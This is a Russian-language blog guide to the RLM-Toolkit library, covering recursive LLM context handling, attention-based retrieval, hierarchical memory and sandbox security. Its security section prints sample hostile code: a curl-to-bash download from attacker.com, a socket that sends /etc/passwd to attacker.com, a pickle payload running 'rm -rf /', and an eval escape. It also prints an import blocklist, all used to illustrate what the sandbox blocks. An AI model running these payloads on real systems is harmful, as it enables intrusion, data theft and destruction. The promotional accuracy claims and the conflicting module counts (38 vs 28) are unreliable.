- BrainTools - https://www.braintools.ru -
От теории до production — архитектура, алгоритмы, безопасность
Это исчерпывающее руководство по RLM-Toolkit — open-source библиотеке для работы с контекстами произвольной длины.
Что рассмотрю:
Формальная теория RLM (State Machine, рекурсия)
InfiniRetri: математика [1] attention-based retrieval
H-MEM: когнитивная архитектура памяти [2]
RAG vs KAG vs GraphRAG vs InfiniRetri
Security: CIRCLE compliance, sandbox escape prevention
Реальные примеры с логами выполнения
Troubleshooting и best practices
Уровень: от middle до PhD-level исследований.
🚀 v1.0.1 вышел вчера — уже 200+ уникальных скачиваний за неполные сутки!
pip install rlm-toolkit
В roadmap: интеграция с NVIDIA KVzap для hardware-accelerated KV-cache compression.
Troubleshooting [12]
|
Модель |
Контекст |
Effective |
Decay λ |
Источник |
|---|---|---|---|---|
|
GPT-4o |
128K |
~80K |
0.012 |
OpenAI |
|
GPT-OSS-120B |
128K |
~100K |
0.010 |
OpenAI |
|
Claude Sonnet 4.5 |
200K |
~150K |
0.010 |
Anthropic |
|
Claude Opus 4.5 |
200K |
~180K |
0.008 |
Anthropic |
|
Gemini 3 Pro |
2M |
~1.5M |
0.003 |
|
|
Gemini 3 Flash |
1M |
~800K |
0.004 |
|
|
Llama 4 Scout |
10M |
~8M |
0.001 |
Meta |
|
Qwen3-235B |
128K |
~100K |
0.011 |
Alibaba |
Quality(c) = Q₀ × e^(-λc) + ε
где:
Q₀ = базовое качество модели (при c → 0)
λ = коэффициент деградации (model-specific)
c = длина контекста в токенах
ε = шум (hallucinations baseline)
Почему экспоненциальная? Attention в трансформерах масштабируется как O(n²). При росте контекста:
Attention weights размазываются по большему числу токенов
Важная информация “тонет” в массе
Positional encoding теряет точность на дальних позициях
Тесты на OOLONG-Pairs (arxiv:2512.24601):
|
Контекст |
NIAH (простая) |
OOLONG-Pairs (сложная) |
|---|---|---|
|
8K |
98% |
72% |
|
32K |
97% |
58% |
|
128K |
95% |
31% |
|
512K |
91% |
8% |
|
1M |
89% |
<0.1% 😱 |
OOLONG-Pairs — задача сравнения пар сущностей, разбросанных по документу. Требует глобального понимания, а не локального поиска.
Chunking:
chunks = split(document, size=100_000)
results = [llm.analyze(chunk) for chunk in chunks]
final = merge(results)
# ❌ ПРОБЛЕМА: cross-chunk references потеряны
# Если факт A в chunk 1, а факт B в chunk 5 — связь не найдена
Summarization:
summary = llm.summarize(document) # 10M → 10K
answer = llm.query(summary, question)
# ❌ ПРОБЛЕМА: детали потеряны безвозвратно
# "В договоре 847 пунктов" → "Подробный договор"
RAG:
relevant = vectordb.search(query, k=10)
answer = llm.generate(query, relevant)
# ❌ ПРОБЛЕМА: semantic similarity ≠ relevance
# "Найди противоречия" — какой embedding искать?
«Длинные промпты не должны загружаться в нейросеть напрямую. Они должны быть частью окружения, с которым LLM взаимодействует символически»
— Zhang, Kraska, Khattab (arxiv:2512.24601)
┌────────────────────────────────────────────────────────────────┐
│ RLM ARCHITECTURE │
├────────────────────────────────────────────────────────────────┤
│ │
│ ┌──────────────────────────────────────────────────────────┐ │
│ │ INPUT LAYER │ │
│ │ context = "10M tokens..." query = "Find bugs" │ │
│ └──────────────────────────────────────────────────────────┘ │
│ ↓ │
│ ┌──────────────────────────────────────────────────────────┐ ��
│ │ REPL ENVIRONMENT (Python) │ │
│ │ Variables: {context, vars, history} │ │
│ │ Functions: {llm_query, FINAL, FINAL_VAR} │ │
│ └──────────────────────────────────────────────────────────┘ │
│ ↓ │
│ ┌──────────────────────────────────────────────────────────┐ │
│ │ ROOT LLM (Controller) │ │
│ │ Generates Python code to analyze context │ │
│ │ Makes decisions about sub-calls │ │
│ └──────────────────────────────────────────────────────────┘ │
│ ↓ ↓ │
│ ┌─────────────────┐ ┌─────────────────────────┐ │
│ │ CODE EXECUTOR │ │ SUB-LLM CALLS │ │
│ │ (Sandboxed) │ │ llm_query(prompt) │ │
│ │ AST validation │ │ depth++, budget-- │ │
│ └─────────────────┘ └─────────────────────────┘ │
│ ↓ ↓ │
│ ┌──────────────────────────────────────────────────────────┐ │
│ │ STATE UPDATE │ │
│ │ vars.update(new_vars) │ │
│ │ history.append(output) │ │
│ └──────────────────────────────────────────────────────────┘ │
│ ↓ │
│ FINAL(answer) → OUTPUT │
│ │
└────────────────────────────────────────────────────────────────┘
Определение 1. Recursive Language Model (RLM) — это кортеж (L, E, R, S, δ, F) где:
L : Language Model (root LLM)
E : Execution Environment (Python REPL)
R : Recursive mechanism (llm_query function)
S : State space = {context, vars, history, depth, cost}
δ : Transition function S × Action → S
F : Termination predicate (FINAL detected)
State = (context: str, vars: Dict, history: List, depth: int, cost: float)
Actions:
- CODE(c) : Execute code c, update vars
- QUERY(p) : Call sub-LLM with prompt p, depth++
- FINAL(x) : Terminate with output x
- FINAL_VAR(v): Terminate with vars[v]
Transitions:
S₀ = (P, {}, [], 0, 0.0) # Initial state
δ(S, CODE(c)):
output = execute(c, S.vars)
return S with {
vars = S.vars ∪ new_vars(output),
history = S.history + [output]
}
δ(S, QUERY(p)):
result = sub_llm.generate(p)
return S with {
vars = S.vars ∪ {"last_query": result},
history = S.history + [result],
depth = S.depth + 1,
cost = S.cost + query_cost(p, result)
}
δ(S, FINAL(x)):
HALT with output x
Context Never Loaded: context существует как переменная, но никогда не подаётся в LLM целиком
Depth Bounded: depth ≤ max_depth (обычно 2-3)
Cost Bounded: cost ≤ max_cost (бюджет в USD)
Termination Guaranteed: Либо FINAL, либо max_iterations
# Query: "Найди все SQL-инъекции в коде"
# Iteration 1: Root LLM generates code
"""
sections = context.split("\n\n# FILE:")
print(f"Found {len(sections)} files")
sql_patterns = ["execute(", "cursor.execute", "raw("]
suspicious = []
for i, section in enumerate(sections):
if any(p in section for p in sql_patterns):
suspicious.append(i)
print(f"Suspicious files: {suspicious}")
"""
# Output: "Found 47 filesnSuspicious files: [3, 12, 29, 45]"
# Iteration 2: Deep analysis via sub-LLM
"""
for idx in suspicious[:3]: # Analyze first 3
file_content = sections[idx][:8000] # Truncate for sub-call
analysis = llm_query(f'''
Analyze this code for SQL injection vulnerabilities:
{file_content}
''')
print(f"File {idx}: {analysis}")
"""
# Output: "File 3: VULNERABLE - unsanitized user input at line 42..."
# Iteration 3: Compile results
"""
vulnerabilities = [
{"file": 3, "line": 42, "type": "SQL Injection"},
{"file": 12, "line": 87, "type": "SQL Injection"},
# ...
]
FINAL_VAR(vulnerabilities)
"""
Query: "Найди все упоминания дедлайна"
Vector Search:
1. Embed query → q_vec
2. For each chunk: similarity(q_vec, chunk_vec)
3. Return top-k
ПРОБЛЕМА: "deadline" может быть написан как:
- "крайний срок"
- "до 15 января"
- "не позднее первого квартала"
Vector similarity НЕ ПОНИМАЕТ семантику!
Использовать внутренние attention weights LLM как сигнал релевантности.
LLM уже “знает”, на какие токены обращать внимание [14] для ответа на вопрос. Мы просто извлекаем эту информацию.
def infiniretri(context: str, question: str, model: LLM) -> str:
"""
Attention-Based Infinite Context Retrieval
Based on arxiv:2502.12962
"""
# Step 1: Chunk context into segments
segments = chunk(context, size=SEGMENT_SIZE) # e.g., 8K tokens each
# Step 2: Initialize historical context
historical_context = ""
# Step 3: Iterative processing (like human reading)
for segment in segments:
# Combine historical context + current segment
combined = historical_context + segment
# Run model with question to get attention
output, attention_weights = model.forward_with_attention(
prompt=f"Context: {combined}nnQuestion: {question}"
)
# Step 4: Attention-based retrieval
# Average attention across layers and heads
avg_attention = attention_weights.mean(dim=[0, 1]) # [seq_len]
# Find tokens with highest attention
top_indices = avg_attention.topk(k=TOP_K).indices
# Step 5: Update historical context
# Keep only high-attention tokens from combined
relevant_tokens = [combined[i] for i in top_indices]
historical_context = "".join(relevant_tokens)
# Step 6: Final answer with preserved context
return model.generate(
f"Context: {historical_context}nnQuestion: {question}nnAnswer:"
)
Attention Score Aggregation:
A_final = (1/L) × Σ_{l=1}^{L} (1/H) × Σ_{h=1}^{H} A_{l,h}
где:
L = number of layers
H = number of heads per layer
A_{l,h} = attention matrix at layer l, head h
Token Importance Score:
importance(t) = Σ_{q ∈ query_tokens} A_final[q, t]
Токены с высоким importance сохраняются в historical context.
|
Benchmark |
Baseline LLM |
+ RAG |
+ InfiniRetri |
|---|---|---|---|
|
NIAH @1M |
23% |
61% |
100% |
|
LongBench |
31% |
51% |
89% (+288%) |
|
SCrolls |
44% |
58% |
82% |
|
Quality |
29% |
47% |
71% |
from rlm_toolkit.retrieval import InfiniRetriever
# Initialize with small model for efficiency (default: Qwen2.5-0.5B)
retriever = InfiniRetriever(
model_name_or_path="Qwen/Qwen2.5-0.5B-Instruct",
)
# Load massive document
with open("codebase_1m_tokens.txt") as f:
huge_doc = f.read()
# Retrieve with 100% accuracy
answer = retriever.retrieve(
context=huge_doc,
question="В какой функции определён SecurityEngine?"
)
print(answer)
# Output: "SecurityEngine определён в файле engines/base.py,
# функция create_engine() на строке 142"
|
Аспект |
RAG |
KAG |
GraphRAG |
InfiniRetri |
|---|---|---|---|---|
|
Подход |
Vector similarity |
Knowledge Graph |
Community detection |
Attention-based |
|
Индексация |
Embedding + VectorDB |
Entity extraction + Graph |
Summarization + Leiden |
None (runtime) |
|
Время индекса |
Минуты |
Часы |
Часы |
0 |
|
Требования |
Embedding model |
Graph DB + LLM |
LLM + много $$ |
Attention access |
|
Глобальный контекст |
❌ |
✅ |
✅ |
✅ |
|
Точный поиск |
~70% |
~85% |
~80% |
100% |
|
Стоимость |
$ |
$$$ |
$$$$ |
$ |
|
Open Source |
✅ |
✅ |
✅ |
✅ |
┌─────────────────────────────────────────────────────────────────┐
│ DECISION TREE │
├─────────────────────────────────────────────────────────────────┤
│ │
│ Контекст < 50K токенов? │
│ └─ YES → Стандартный RAG (дёшево, просто) │
│ └─ NO ↓ │
│ │
│ Нужны структурированные связи? │
│ └─ YES → KAG (медицина, право, финансы) │
│ └─ NO ↓ │
│ │
│ Нужен глобальный обзор большого корпуса? │
│ └─ YES → GraphRAG (research, due diligence) │
│ └─ NO ↓ │
│ │
│ Критична точность поиска? │
│ └─ YES → InfiniRetri (код, юридика, security) │
│ └─ NO ↓ │
│ │
│ Контекст > 500K токенов? │
│ └─ YES → RLM + InfiniRetri │
│ └─ NO → RAG достаточно │
│ │
└─────────────────────────────────────────────────────────────────┘
RAG + InfiniRetri (Hybrid Retrieval):
from rlm_toolkit.retrieval import HybridRetriever, VectorRetriever, InfiniRetriever
hybrid = HybridRetriever(
retrievers=[
VectorRetriever(model="BAAI/bge-m3", weight=0.3),
InfiniRetriever(model="Qwen/Qwen3-0.6B", weight=0.7),
],
fusion="reciprocal_rank" # RRF fusion
)
# Fast vector pre-filter + precise attention refinement
results = hybrid.retrieve(context, question)
KAG + InfiniRetri (Graph-Enhanced):
from rlm_toolkit.retrieval import KAGRetriever, InfiniRetriever
# Step 1: KAG finds relevant entities
kag = KAGRetriever(graph_db="neo4j://localhost:7687")
entities = kag.query("Все контракты с Газпром")
# Step 2: InfiniRetri finds exact mentions
infini = InfiniRetriever("Qwen/Qwen3-0.6B")
for entity in entities:
details = infini.retrieve(
context=full_document,
question=f"Подробности о {entity.name}"
)
|
Метод |
Индексация |
Query |
Total (100 queries) |
|---|---|---|---|
|
RAG (OpenAI) |
$0.13 |
$0.02 |
$2.13 |
|
KAG (GPT-4o) |
$15.00 |
$0.50 |
$65.00 |
|
GraphRAG |
$50.00 |
$0.10 |
$60.00 |
|
InfiniRetri |
$0.00 |
$0.05 |
$5.00 |
|
RLM + InfiniRetri |
$0.00 |
$0.30 |
$30.00 |
# LangChain ConversationBufferMemory
class BufferMemory:
def __init__(self, max_tokens=4000):
self.buffer = []
self.max_tokens = max_tokens
def add(self, message):
self.buffer.append(message)
# FIFO eviction
while token_count(self.buffer) > self.max_tokens:
self.buffer.pop(0) # ❌ Старое = потеряно навсегда
Проблемы:
FIFO eviction — важное старое удаляется раньше неважного нового
Нет абстракции — “вчера обсуждали Python” и детали на одном уровне
Нет связей — разговоры изолированы
H-MEM основан на Complementary Learning Systems (CLS) theory:
HIPPOCAMPUS (быстрое запоминание)
↓ consolidation
NEOCORTEX (долговременное хранение, абстракции)
4 уровня H-MEM:
┌─────────────────────────────────────────────────────────────────┐
│ LEVEL 3: DOMAIN │
│ "Пользователь — разработчик, интересуется AI Security" │
│ Очень редко меняется, высокая абстракция │
├───────────────────────────────────��─────────────────────────────┤
│ LEVEL 2: CATEGORY │
│ "Тема: погода", "Тема: код", "Тема: документация" │
│ Семантические кластеры │
├─────────────────────────────────────────────────────────────────┤
│ LEVEL 1: TRACE │
│ "Обсуждали погоду в Москве и Питере, предпочитает +20°C" │
│ Консолидированные воспоминания │
├─────────────────────────────────────────────────────────────────┤
│ LEVEL 0: EPISODE │
│ "User: какая погода?" "AI: +15°C, облачно" │
│ Сырые взаимодействия │
└─────────────────────────────────────────────────────────────────┘
class HierarchicalMemory:
def consolidate(self):
"""
Memory consolidation: Episodes → Traces → Categories → Domains
"""
# Step 1: Cluster episodes by semantic similarity
episode_embeddings = self.embed(self.episodes)
clusters = HDBSCAN(min_cluster_size=3).fit(episode_embeddings)
# Step 2: Create traces via LLM summarization
for cluster_id in set(clusters.labels_):
if cluster_id == -1: # Noise
continue
cluster_episodes = [
self.episodes[i]
for i, c in enumerate(clusters.labels_)
if c == cluster_id
]
trace = self.llm.summarize(
f"Summarize these interactions:n{cluster_episodes}"
)
self.traces.append(Trace(
content=trace,
source_episodes=cluster_episodes,
timestamp=now()
))
# Step 3: Cluster traces → categories
if len(self.traces) >= 5:
trace_embeddings = self.embed([t.content for t in self.traces])
trace_clusters = KMeans(n_clusters=min(5, len(self.traces)//3))
for cluster_id in range(trace_clusters.n_clusters):
cluster_traces = [
self.traces[i]
for i, c in enumerate(trace_clusters.labels_)
if c == cluster_id
]
category = self.llm.summarize(
f"What category do these belong to?n{cluster_traces}"
)
self.categories.append(Category(content=category))
# Step 4: Update domain (rarely)
if len(self.categories) >= 3 and self._should_update_domain():
self.domain = self.llm.generate(
f"Based on categories {self.categories}, "
f"describe the user's overall interests and profile."
)
Что если новая информация противоречит старой?
def add_episode_with_conflict_check(self, new_episode: str):
"""
Check for conflicts and update memories accordingly.
"""
# Find potentially conflicting memories
similar = self.retrieve(new_episode, k=5)
for memory in similar:
conflict = self.llm.check_conflict(
f"Old: {memory.content}nNew: {new_episode}"
)
if conflict.is_conflict:
if conflict.new_supersedes:
# Update old memory
memory.content = self.llm.merge(
f"Update '{memory.content}' with '{new_episode}'"
)
memory.updated_at = now()
else:
# Flag for human review
self.conflicts.append(Conflict(old=memory, new=new_episode))
self.episodes.append(Episode(content=new_episode))
from rlm_toolkit.memory import SecureHierarchicalMemory
from rlm_toolkit.crypto import AES256GCM
# Create encrypted memory with trust zones
smem = SecureHierarchicalMemory(
agent_id="agent-financial",
trust_zone="confidential",
encryption=AES256GCM(key=os.environ["HMEM_KEY"]),
)
# Add sensitive data (encrypted at rest)
smem.add_episode("Client SSN: 123-45-6789") # Encrypted!
# Other agents cannot access
other_agent = SecureHierarchicalMemory(agent_id="agent-public")
try:
other_agent.retrieve("SSN") # ❌ AccessDenied
except AccessDenied:
pass
# Grant explicit access
smem.grant_access("agent-compliance", "confidential")
compliance_agent = SecureHierarchicalMemory(agent_id="agent-compliance")
compliance_agent.retrieve("SSN") # ✅ Works
LLM сама генерирует задачи → решает их → улучшается. Без размеченных данных, без human feedback.
Основано на:
R-Zero (arxiv:2508.05004) — Challenger-Solver co-evolution
REBASE (arxiv:2512.29379) — Experience replay с scoring
┌─────────────────────────────────────────────────────────────────┐
│ R-ZERO LOOP │
├─────────────────────────────────────────────────────────────────┤
│ │
│ ┌───────────────┐ ┌───────────────┐ │
│ │ CHALLENGER │ ──────→ │ SOLVER │ │
│ │ Generates │ │ Attempts │ │
│ │ hard tasks │ │ to solve │ │
│ └───────────────┘ └───────────────┘ │
│ ↑ │ │
│ │ ↓ │
│ │ ┌───────────────┐ │
│ │ │ VERIFIER │ │
│ │ │ Checks if │ │
│ │ │ correct │ │
│ │ └───────────────┘ │
│ │ │ │
│ │ ┌─────────────┴─────────────┐ │
│ │ ↓ ↓ │
│ │ ┌──────────┐ ┌──────────┐ │
│ │ │ CORRECT │ │ WRONG │ │
│ │ │ +reward │ │ -reward │ │
│ │ └──────────┘ └──────────┘ │
│ │ │ │ │
│ │ └───────────┬───────────────┘ │
│ │ ↓ │
│ │ ┌─────────────────┐ │
│ └───────────── │ EVOLUTION POOL │ │
│ │ Best strategies │ │
│ └─────────────────┘ │
│ │
└─────────────────────────────────────────────────────────────────┘
from rlm_toolkit.evolve import SelfEvolvingRLM, EvolutionStrategy
from rlm_toolkit.providers import OllamaProvider
# Initialize
evolve = SelfEvolvingRLM(
provider=OllamaProvider("llama4-scout:17b"),
strategy=EvolutionStrategy.CHALLENGER_SOLVER,
config={
"challenge_diversity": 0.8, # How different each challenge
"difficulty_ramp": 0.1, # How fast difficulty increases
"memory_size": 1000, # Experience buffer size
}
)
# Single solve with self-refinement
answer = evolve.solve("Докажи, что √2 иррационально")
print(f"Answer: {answer.answer}")
print(f"Confidence: {answer.confidence}")
print(f"Iterations: {answer.iterations}")
# Training loop (improves over time)
metrics = evolve.training_loop(
iterations=100,
domain="math",
difficulty="hard",
save_checkpoint=True,
)
print(f"Initial success rate: {metrics.initial_rate}") # e.g., 65%
print(f"Final success rate: {metrics.final_rate}") # e.g., 89%
print(f"Best strategies: {metrics.top_strategies}")
from rlm_toolkit.evolve import REBASE
rebase = REBASE(
provider=OllamaProvider("llama4-scout:109b"),
scorer="outcome", # Score by final outcome
)
# Collect experiences
for task in tasks:
trajectory = rebase.solve_with_trajectory(task)
rebase.add_experience(trajectory)
# Train on best experiences
improved = rebase.train(
epochs=10,
batch_size=32,
top_k_ratio=0.2, # Use top 20% trajectories
)
# LLM может сгенерировать:
# 1. RCE via subprocess
import subprocess
subprocess.run(["curl", "attacker.com/shell.sh", "|", "bash"])
# 2. Data exfiltration via network
import socket
s = socket.socket()
s.connect(("attacker.com", 4444))
s.send(open("/etc/passwd").read().encode())
# 3. Pickle RCE
import pickle
class Exploit:
def __reduce__(self):
return (os.system, ("rm -rf /",))
pickle.loads(pickle.dumps(Exploit()))
# 4. Builtins escape
eval("__import__('os').system('whoami')")
CIRCLE = Code Injection for RLM via Crafted Linguistic Exploits
Тестирует 7 категорий атак:
Direct code injection
Obfuscated code injection
Indirect injection via context
Memory corruption attempts
Privilege escalation
Data exfiltration
Denial of service
┌─────────────────────────────────────────────────────────────────┐
│ SECURITY LAYERS │
├─────────────────────────────────────────────────────────────────┤
│ │
│ Layer 1: AST STATIC ANALYSIS │
│ ───────────────────────────── │
│ Before execution, parse code to AST and check: │
│ - Import statements against blocklist │
│ - Function calls against dangerous patterns │
│ - Attribute access (__builtins__, __globals__) │
│ │
│ Layer 2: IMPORT BLOCKLIST (38 modules) │
│ ───────────────────────────────────── │
│ os, sys, subprocess, shutil, pathlib, │
│ socket, http, urllib, ftplib, telnetlib, requests, │
│ pickle, shelve, dill, cloudpickle, marshal, │
│ ctypes, cffi, multiprocessing, threading, │
│ code, codeop, pty, tty, termios, │
│ tempfile, glob, fnmatch, webbrowser, platform, │
│ asyncio (subprocess), importlib, builtins │
│ │
│ Layer 3: SANDBOXED EXECUTION │
│ ───────────────────────────── │
│ - Restricted builtins (no eval, exec, compile, open) │
│ - Timeout enforcement (default 30s) │
│ - Memory limit (default 512MB) │
│ - Virtual filesystem with quotas │
│ │
│ Layer 4: OUTPUT SANITIZATION │
│ ───────────────────────────── │
│ - Truncate output to prevent context overflow │
│ - Scan for sensitive data patterns (API keys, passwords) │
│ - Redact before returning to user │
│ │
└─────────────────────────────────────────────────────────────────┘
from rlm_toolkit import RLM, RLMConfig, SecurityConfig
# Maximum security configuration
config = RLMConfig(
security=SecurityConfig(
sandbox=True,
max_execution_time=30.0,
max_memory_mb=512,
blocked_imports="strict", # All 38 modules
allow_network=False,
allow_filesystem=False,
virtual_fs_quota_mb=100,
redact_sensitive=True,
sensitive_patterns=[
r"[A-Za-z0-9]{32}", # API keys
r"passwords*[:=]", # Passwords
r"d{3}-d{2}-d{4}", # SSN
],
)
)
rlm = RLM.from_ollama("llama4-scout:17b", config=config)
# This is now safe
result = rlm.run(untrusted_document, "Analyze this")
================================ test session starts ================================
collected 27 items
tests/security/test_blocked_imports.py::test_os_blocked PASSED
tests/security/test_blocked_imports.py::test_subprocess_blocked PASSED
tests/security/test_blocked_imports.py::test_socket_blocked PASSED
tests/security/test_blocked_imports.py::test_pickle_blocked PASSED
tests/security/test_blocked_imports.py::test_ctypes_blocked PASSED
tests/security/test_sandbox.py::test_timeout_enforcement PASSED
tests/security/test_sandbox.py::test_memory_limit PASSED
tests/security/test_sandbox.py::test_builtins_restricted PASSED
tests/security/test_sandbox.py::test_eval_blocked PASSED
tests/security/test_sandbox.py::test_exec_blocked PASSED
tests/security/test_exfiltration.py::test_network_blocked PASSED
tests/security/test_exfiltration.py::test_file_read_blocked PASSED
tests/security/test_obfuscation.py::test_base64_decode_blocked PASSED
tests/security/test_obfuscation.py::test_hex_decode_blocked PASSED
tests/security/test_obfuscation.py::test_rot13_blocked PASSED
tests/security/test_indirect.py::test_context_injection_blocked PASSED
tests/security/test_indirect.py::test_prompt_injection_detected PASSED
tests/security/test_builtins.py::test_globals_access_blocked PASSED
tests/security/test_builtins.py::test_builtins_access_blocked PASSED
tests/security/test_builtins.py::test_subclasses_blocked PASSED
tests/security/test_vfs.py::test_quota_enforcement PASSED
tests/security/test_vfs.py::test_path_traversal_blocked PASSED
tests/security/test_redaction.py::test_api_key_redacted PASSED
tests/security/test_redaction.py::test_password_redacted PASSED
tests/security/test_redaction.py::test_ssn_redacted PASSED
tests/security/test_circle.py::test_circle_benchmark_passed PASSED
tests/security/test_circle.py::test_all_attack_categories_blocked PASSED
================================ 27 passed in 12.34s ================================
|
Category |
Providers |
|---|---|
|
Cloud API |
OpenAI, Anthropic, Google, Mistral, Cohere, AI21 |
|
Inference API |
Together, Fireworks, Groq, Hyperbolic, Anyscale |
|
Local |
Ollama, vLLM, llama.cpp, LM Studio, LocalAI |
|
Enterprise |
Azure OpenAI, AWS Bedrock, GCP Vertex AI |
|
Provider |
Model |
Context |
Code Gen |
Speed |
Cost/1M tok |
|---|---|---|---|---|---|
|
OpenAI |
GPT-4o |
128K |
⭐⭐⭐⭐ |
Fast |
$5 |
|
OpenAI |
GPT-OSS-120B |
128K |
⭐⭐⭐⭐ |
Fast |
$3 |
|
Anthropic |
Claude Opus 4.5 |
200K |
⭐⭐⭐⭐⭐ |
Medium |
$15 |
|
Anthropic |
Claude Sonnet 4.5 |
200K |
⭐⭐⭐⭐⭐ |
Fast |
$3 |
|
|
Gemini 3 Pro |
2M |
⭐⭐⭐⭐ |
Fast |
$1.25 |
|
|
Gemini 3 Flash |
1M |
⭐⭐⭐⭐ |
Very Fast |
$0.08 |
|
Meta |
Llama 4 Scout |
10M |
⭐⭐⭐⭐ |
Varies |
Free |
|
Alibaba |
Qwen3-235B |
128K |
⭐⭐⭐⭐ |
Fast |
$0.50 |
|
Mistral |
Large 3 |
128K |
⭐⭐⭐⭐ |
Fast |
$2 |
💰 Budget-First:
from rlm_toolkit import RLM, RLMConfig
# Use factory methods for easy setup
rlm = RLM.from_ollama("llama4-scout") # 100% free local
# Cost: $0 per 10M token analysis
🏆 Quality-First:
# Claude for best code generation
rlm = RLM.from_anthropic(
root_model="claude-opus-4.5",
sub_model="claude-haiku",
)
# Cost: ~$8 per 10M token analysis
🔒 Privacy-First (100% Local):
rlm = RLM(
root=OllamaProvider("llama4-scout:109b"), # 10M native context!
sub=OllamaProvider("qwen3:7b"), # Fast inference
)
# Cost: $0 + electricity (~$0.50)
⚡ Speed-First:
# OpenAI is fastest cloud option
rlm = RLM.from_openai(
root_model="gpt-4o",
sub_model="gpt-4o-mini",
)
# Speed: ~2 min for 10M tokens
import os
import time
from rlm_toolkit import RLM, RLMConfig, SecurityConfig
from rlm_toolkit.memory import HierarchicalMemory
from rlm_toolkit.observability import ConsoleTracer
# Configuration
config = RLMConfig(
max_iterations=50,
max_cost=5.0,
use_infiniretri=True,
infiniretri_threshold=100_000,
security=SecurityConfig(sandbox=True),
)
# Memory and tracing
memory = HierarchicalMemory()
tracer = ConsoleTracer(verbose=True)
# Initialize RLM
rlm = RLM.from_ollama(
model="llama4-scout:109b",
config=config,
memory=memory,
tracer=tracer,
)
# Load repository
def load_repo(path: str) -> str:
content = []
for root, dirs, files in os.walk(path):
# Skip hidden and common excludes
dirs[:] = [d for d in dirs if not d.startswith('.') and d not in ['node_modules', '__pycache__', 'venv']]
for f in files:
if f.endswith(('.py', '.js', '.ts', '.go', '.rs')):
filepath = os.path.join(root, f)
try:
with open(filepath, encoding='utf-8') as fp:
content.append(f"nn# === FILE: {filepath} ===n{fp.read()}")
except:
pass
return "".join(content)
codebase = load_repo("./my_project")
print(f"Loaded {len(codebase):,} characters ({len(codebase)//4:,} tokens)")
# Run analysis
start = time.time()
result = rlm.run(
context=codebase,
query="""
Проведи полный security audit кодовой базы:
1. SQL/NoSQL инъекции
2. XSS уязвимости
3. SSRF
4. Hardcoded secrets
5. Небезопасная десериализация
6. Path traversal
7. Проблемы с аутентификацией/авторизацией
8. Race conditions
Для каждой найденной уязвимости укажи:
- Файл и строку
- Тип уязвимости
- Severity (Critical/High/Medium/Low)
- Рекомендацию по исправлению
""",
)
elapsed = time.time() - start
print("n" + "="*60)
print("РЕЗУЛЬТАТ:")
print("="*60)
print(result.answer)
print(f"nВремя: {elapsed:.1f}s")
print(f"Итераций: {result.iterations}")
print(f"Sub-calls: {result.subcalls}")
print(f"Стоимость: ${result.cost:.2f}")
[RLM] Starting analysis...
[RLM] Context size: 2,847,293 chars (711,823 tokens)
[RLM] Using InfiniRetri (threshold exceeded)
[Iter 1] Root LLM generating code...
>>> files = context.split("# === FILE:")
>>> print(f"Repository contains {len(files)} files")
Output: Repository contains 127 files
[Iter 2] Root LLM generating code...
>>> security_patterns = {
... "sql_injection": [r"execute(.*%s", r".format(.*)", r"f".*SELECT"],
... "xss": [r"innerHTMLs*=", r".html(.*+"],
... "secrets": [r"passwords*=s*["']", r"api_keys*=", r"secrets*="],
... }
>>> import re
>>> findings = []
>>> for i, file in enumerate(files[1:], 1):
... for vuln_type, patterns in security_patterns.items():
... for pattern in patterns:
... if re.search(pattern, file):
... findings.append((i, vuln_type, pattern))
>>> print(f"Found {len(findings)} potential issues")
Output: Found 23 potential issues
[Iter 3] Sub-LLM call for deep analysis...
>>> for file_idx, vuln_type, _ in findings[:5]:
... file_content = files[file_idx][:6000]
... analysis = llm_query(f"Analyze for {vuln_type}:n{file_content}")
... print(f"File {file_idx}: {analysis[:200]}")
[SUB-CALL 1/5] Analyzing file 3...
[SUB-CALL 2/5] Analyzing file 7...
[SUB-CALL 3/5] Analyzing file 12...
[SUB-CALL 4/5] Analyzing file 19...
[SUB-CALL 5/5] Analyzing file 24...
...
[Iter 8] Compiling final report...
>>> vulnerabilities = [
... {"file": "api/users.py", "line": 42, "type": "SQL Injection",
... "severity": "Critical", "code": "cursor.execute(f'SELECT * FROM users WHERE id={user_id}')"},
... {"file": "utils/auth.py", "line": 87, "type": "Hardcoded Secret",
... "severity": "High", "code": "API_KEY = 'sk-abc123...'"},
... ...
... ]
>>> FINAL_VAR(vulnerabilities)
============================================================
РЕЗУЛЬТАТ:
============================================================
[
{
"file": "api/users.py",
"line": 42,
"type": "SQL Injection",
"severity": "Critical",
"description": "User input directly interpolated into SQL query",
"recommendation": "Use parameterized queries: cursor.execute('SELECT * FROM users WHERE id=%s', (user_id,))"
},
{
"file": "utils/auth.py",
"line": 87,
"type": "Hardcoded Secret",
"severity": "High",
"description": "API key hardcoded in source code",
"recommendation": "Move to environment variable: os.environ.get('API_KEY')"
},
...
]
Время: 127.3s
Итераций: 8
Sub-calls: 12
Стоимость: $0.00 (local model)
|
Проблема |
Причина |
Решение |
|---|---|---|
|
|
LLM не может найти ответ |
Увеличить |
|
|
Слишком много sub-calls |
Ограничить |
|
|
Код выполняется слишком долго |
Увеличить |
|
|
Импорт заблокирован security |
Добавить в whitelist если безопасно |
|
|
OOM на маленькой модели |
Использовать меньший |
from rlm_toolkit import RLM
from rlm_toolkit.observability import ConsoleTracer, FileTracer
# Console tracing (development)
rlm = RLM.from_ollama("llama4-scout:17b", tracer=ConsoleTracer(verbose=True))
# File tracing (production)
rlm = RLM.from_ollama("llama4-scout:17b", tracer=FileTracer("./logs/rlm.log"))
# View execution history
result = rlm.run(context, query)
for step in result.trace:
print(f"[{step.type}] {step.content[:100]}...")
# 1. Use smaller model for sub-calls
rlm = RLM(
root=OllamaProvider("llama4-scout:109b"), # Smart for planning
sub=OllamaProvider("qwen3:7b"), # Fast for details
)
# 2. Enable caching
from rlm_toolkit.cache import DiskCache
rlm = RLM.from_ollama("llama4-scout:17b", cache=DiskCache("./cache"))
# 3. Parallel sub-calls (experimental)
config = RLMConfig(parallel_subcalls=True, max_parallel=4)
|
Компонент |
Описание |
Источник |
|---|---|---|
|
RLM Core |
Recursive Language Models |
arxiv:2512.24601 |
|
InfiniRetri |
Attention-based infinite retrieval |
arxiv:2502.12962 |
|
H-MEM |
Hierarchical memory |
arxiv:2507.XXXXX |
|
R-Zero |
Self-evolving LLMs |
arxiv:2508.05004 |
|
REBASE |
Experience replay |
arxiv:2512.29379 |
|
CIRCLE |
Security benchmark |
arxiv:2507.19399 |
10M+ токенов без деградации качества
100% точность на Needle-in-Haystack
4-уровневая память вместо простого буфера
Блокировка 28 опасных модулей — production-ready security
75+ провайдеров включая 100% локальные варианты
PyPI: pypi.org/project/rlm-toolkit [15]
GitHub: github.com/DmitrL-dev/AISecurity/tree/main/rlm-toolkit [16]
Документация: docs [17]
